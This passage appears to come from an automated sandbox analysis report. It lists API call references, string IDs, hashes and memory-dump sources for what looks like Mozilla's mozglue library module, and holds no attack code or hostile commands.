                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6CA15633
                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6CA1563D
                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6CA1566C
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6CA1567D
                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6CA15696
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6CA156B2
                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6CA156CB
                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6CA156E4
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6CA156FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6CA15716
                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6CA1572F
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6CA15748
                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6CA15761
                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6CA1577A
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6CA15793
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6CA157A8
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6CA157BD
                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6CA157D5
                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6CA157EA
                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6CA157FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                  • API String ID: 2238633743-1964193996
                                                                  • Opcode ID: 3d0e3aefa8ffc54bca10509c21ff83e25f3b6fdd2b2d858154ad18ffbd05646e
                                                                  • Instruction ID: 41945b2beeb8733fec9f61f29c5d5adb1a0a29146d45298edefb87386ee3ff75
                                                                  • Opcode Fuzzy Hash: 3d0e3aefa8ffc54bca10509c21ff83e25f3b6fdd2b2d858154ad18ffbd05646e
                                                                  • Instruction Fuzzy Hash: F8510771B157135FDB14AF388D68A263AF9BB46245724C52DE919E2E41EF34C842CFB0
                                                                  APIs
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13527
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1355B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA135BC
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA135E0
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1363A
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13693
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA136CD
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13703
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1373C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13775
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1378F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13892
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA138BB
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13902
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13939
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13970
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA139EF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13A26
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13AE5
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13E85
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13EBA
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA13EE2
                                                                    • Part of subcall function 6CA16180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6CA161DD
                                                                    • Part of subcall function 6CA16180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6CA1622C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA140F9
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1412F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14157
                                                                    • Part of subcall function 6CA16180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6CA16250
                                                                    • Part of subcall function 6CA16180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CA16292
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA1441B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CA14448
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA1484E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14863
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14878
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CA14896
                                                                  • free.MOZGLUE ref: 6CA1489F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: floor$free$malloc$memcpy
                                                                  • String ID:
                                                                  • API String ID: 3842999660-3916222277
                                                                  • Opcode ID: 73ddee6107e8fd16017c9113b8942af5cb25263e72748a670819795c3c161b53
                                                                  • Instruction ID: ce65634663e89e0945cd8c6776f7b15ac83c94263169e80604ae10985a26079d
                                                                  • Opcode Fuzzy Hash: 73ddee6107e8fd16017c9113b8942af5cb25263e72748a670819795c3c161b53
                                                                  • Instruction Fuzzy Hash: DDF26B74908B818FC735CF28C18469AFBF1FF89358F158A5ED98997712DB319886CB42
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C9C64DF
                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C9C64F2
                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C9C6505
                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C9C6518
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C9C652B
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C9C671C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C9C6724
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C9C672F
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C9C6759
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C9C6764
                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C9C6A80
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C9C6ABE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C9C6AD3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C6AE8
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9C6AF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                  • API String ID: 487479824-2878602165
                                                                  • Opcode ID: d89b7ea0bbf77034996c93e75156f852877b0363659f58f45cb0f52673453836
                                                                  • Instruction ID: 1d77d5da7ddf04d27c2d69efecbbeb688989201b2cdec942529a7698e7527899
                                                                  • Opcode Fuzzy Hash: d89b7ea0bbf77034996c93e75156f852877b0363659f58f45cb0f52673453836
                                                                  • Instruction Fuzzy Hash: 41F1D470A057299FDB20CF24CD48BAAB7B5AF46318F1482D9D809E7681D731EE85CF52
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E60C9
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7DC), ref: 6C9E610D
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C9E618C
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9E61F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 3168844106-429003945
                                                                  • Opcode ID: a0001550c55ebeb3b2673ce0c922ecc2c59f85486e78b567cf39a1727ee4fcc3
                                                                  • Instruction ID: 893838521b157a88e658df27b28492f956a983cc985848bb7939f37aac908fea
                                                                  • Opcode Fuzzy Hash: a0001550c55ebeb3b2673ce0c922ecc2c59f85486e78b567cf39a1727ee4fcc3
                                                                  • Instruction Fuzzy Hash: 26A2CC71A057118FD719CF18C854715BBE1BFAA328F29C66DEA69CBB91C731E841CB80
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1C5F9
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1C6FB
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA1C74D
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6CA1C7DE
                                                                  • memset.VCRUNTIME140(?,00000000,00004014), ref: 6CA1C9D5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1CC76
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1CD7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1DB40
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA1DB62
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA1DB99
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1DD8B
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1DE95
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA1E360
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1E432
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA1E472
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction ID: 19f6a8cfc5d45f856abce0d64aeb23febb3d91cbbae93368d9c7246ff01f1111
                                                                  • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction Fuzzy Hash: 27339E71E0421A8FCB04CFACC8806EDBBF2FF49314F284269D955ABB55D735A985CB90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9CFF81
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9D022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C9D0240
                                                                  • EnterCriticalSection.KERNEL32(6CA3E768), ref: 6C9D025B
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E768), ref: 6C9D027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3577267516
                                                                  • Opcode ID: b898350a494f930af60209a85a9d38ef3588b4bb21b6b6c9ab34d533251736d4
                                                                  • Instruction ID: 1cfdadd0164a47e231306ed6eeebdba1867e0ee94783f1a6187c87206daeb1aa
                                                                  • Opcode Fuzzy Hash: b898350a494f930af60209a85a9d38ef3588b4bb21b6b6c9ab34d533251736d4
                                                                  • Instruction Fuzzy Hash: B9C2D171A05B418FD714CF28C890716BBE1FF86328F29C66DE8A99B795C771E841CB81
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00004014), ref: 6CA1E811
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1EAA8
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6CA1EBD5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1EEF6
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA1F223
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6CA1F322
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6CA20E03
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6CA20E54
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA20EAE
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6CA20ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: 8a1a0127267f778c40f6f13db4c89e94da3b6c0c85d40002d19a30581f4714e4
                                                                  • Instruction ID: b4d6bfffbd3e3b8d10c819755269ed05d420b2f87b4030dad4c10677cda3c962
                                                                  • Opcode Fuzzy Hash: 8a1a0127267f778c40f6f13db4c89e94da3b6c0c85d40002d19a30581f4714e4
                                                                  • Instruction Fuzzy Hash: 5263A071E0425A8FCB04CFACC8905EDFBB2FF89310F298269D855AB755D734A985CB90
                                                                  APIs
                                                                    • Part of subcall function 6CA17770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C9F3E7D,?,?,?,6C9F3E7D,?,?), ref: 6CA1777C
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C9F3F17
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C9F3F5C
                                                                  • VerSetConditionMask.NTDLL ref: 6C9F3F8D
                                                                  • VerSetConditionMask.NTDLL ref: 6C9F3F99
                                                                  • VerSetConditionMask.NTDLL ref: 6C9F3FA0
                                                                  • VerSetConditionMask.NTDLL ref: 6C9F3FA7
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C9F3FB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                  • String ID: nvd3d9wrap.dll$nvinit.dll
                                                                  • API String ID: 1189858803-2380496106
                                                                  • Opcode ID: b95ad87a4cf2a82fc79c7dfe0696f81268e068bcb3903fee813142f9c570df04
                                                                  • Instruction ID: cda434f3f988f25b3b57102400befb25bf0fbd1ed556504e92a265d82e424ad1
                                                                  • Opcode Fuzzy Hash: b95ad87a4cf2a82fc79c7dfe0696f81268e068bcb3903fee813142f9c570df04
                                                                  • Instruction Fuzzy Hash: 33520171610B498FD715DB748980BAB77FABF61204F14492CD4A6CBB42CB38F90ACB61
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C9DEE7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C9DEFB5
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C9E1695
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C9E16B4
                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C9E1770
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C9E1A3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memset$freemallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 3693777188-0
                                                                  • Opcode ID: 8da3bc6d1ea8a30474521edd544c0002e9f3453f7c7b28f788445a7fc53470dd
                                                                  • Instruction ID: 541ac7c7bafaf15d73f35c6c376800af1724e6f22fc5726f3473f76e678e0906
                                                                  • Opcode Fuzzy Hash: 8da3bc6d1ea8a30474521edd544c0002e9f3453f7c7b28f788445a7fc53470dd
                                                                  • Instruction Fuzzy Hash: 29B31971E0421ACFCB15CFA8C890AADB7B2BF59304F1582A9D449BB755D730AD86CF90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9CFF81
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E7B8), ref: 6C9D022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C9D0240
                                                                  • EnterCriticalSection.KERNEL32(6CA3E768), ref: 6C9D025B
                                                                  • LeaveCriticalSection.KERNEL32(6CA3E768), ref: 6C9D027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3566792288
                                                                  • Opcode ID: 42895fa82e7c2cd5160adaec2956606ac98a1f1a83007ce8844999fe9c204a12
                                                                  • Instruction ID: d47846b06f5ea7ac2e65f6aebf00d7472124d71341c1c5746a2cf57e512831c7
                                                                  • Opcode Fuzzy Hash: 42895fa82e7c2cd5160adaec2956606ac98a1f1a83007ce8844999fe9c204a12
                                                                  • Instruction Fuzzy Hash: 6FB2CF71605B418FD718CF29C990716BBE1BF86328F29C66DE86A9FB95C770E840CB41
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: ProfileBuffer parse error: %s$data$expected a Count entry$expected a Time entry$name$schema
                                                                  • API String ID: 0-2712937348
                                                                  • Opcode ID: d4a410ec2cf50aa0d0596d7b2b0961903cbb26e573d2d8c1b0bce98874783e88
                                                                  • Instruction ID: d8f1ae61e585ece84a9c185f8237f145d1055ff25c335fc5ddfcf8520b6c585e
                                                                  • Opcode Fuzzy Hash: d4a410ec2cf50aa0d0596d7b2b0961903cbb26e573d2d8c1b0bce98874783e88
                                                                  • Instruction Fuzzy Hash: 83923C71A083418FD724CF18D49079BB7E1BFC9348F18891DE99A9B751DB30E989CB92
                                                                  APIs
                                                                  • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CA02ED3
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA02EE7
                                                                  • MozFormatCodeAddressDetails.MOZGLUE(?,000000FF,00000000,?,?), ref: 6CA02F0D
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA03214
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CA03242
                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA036BF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: strlen$AddressCode$DescribeDetailsFormat
                                                                  • String ID: MOZ_PROFILER_SYMBOLICATE$get $set
                                                                  • API String ID: 2257098003-3318126862
                                                                  • Opcode ID: a2615a264576535268fde7a03842178f8f37f6b6159a076b910abf09f29cbc08
                                                                  • Instruction ID: f4c97e5c38e995fd5ab7d2d4daf382b7cff3ec020b0772a7fc3e430c7510f380
                                                                  • Opcode Fuzzy Hash: a2615a264576535268fde7a03842178f8f37f6b6159a076b910abf09f29cbc08
                                                                  • Instruction Fuzzy Hash: 9C327D706093818FD324CF24D490A9FBBE2AFC9358F58891DE5D987751DB31E88ACB52
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2310018099.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2309989797.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310269865.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310324339.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2310708430.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File
